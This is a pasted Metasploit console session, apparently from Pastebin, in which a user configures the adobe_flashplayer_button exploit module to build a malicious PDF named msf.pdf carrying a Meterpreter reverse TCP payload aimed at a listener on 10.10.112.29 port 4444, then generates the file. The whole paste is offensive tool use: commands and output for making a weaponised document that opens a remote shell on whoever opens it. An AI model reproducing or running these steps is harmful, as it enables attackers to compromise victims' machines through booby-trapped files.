Advertisement
Guest User

Untitled

a guest
Jun 25th, 2017
70
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.13 KB | None | 0 0
  1. msf exploit(adobe_flashplayer_button) > how options
  2. [-] Unknown command: how.
  3. msf exploit(adobe_flashplayer_button) > show options
  4.  
  5. Module options:
  6.  
  7. Name Current Setting Required Description
  8. ---- --------------- -------- -----------
  9. FILENAME msf.pdf yes The file name.
  10. OUTPUTPATH /opt/metasploit3/msf3/data/exploits yes The location of the file.
  11.  
  12.  
  13. Payload options (windows/meterpreter/reverse_tcp):
  14.  
  15. Name Current Setting Required Description
  16. ---- --------------- -------- -----------
  17. EXITFUNC process yes Exit technique: seh, thread, none, process
  18. LHOST 10.10.112.29 yes The listen address
  19. LPORT 4444 yes The listen port
  20.  
  21.  
  22. Exploit target:
  23.  
  24. Id Name
  25. -- ----
  26. 0 Automatic
  27.  
  28.  
  29. msf exploit(adobe_flashplayer_button) > exploit
  30.  
  31. [*] Creating 'msf.pdf' file...
  32. [*] Generated output file /opt/metasploit3/msf3/data/exploits/msf.pdf
  33. [*] Exploit completed, but no session was created.
  34. msf exploit(adobe_flashplayer_button) >
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement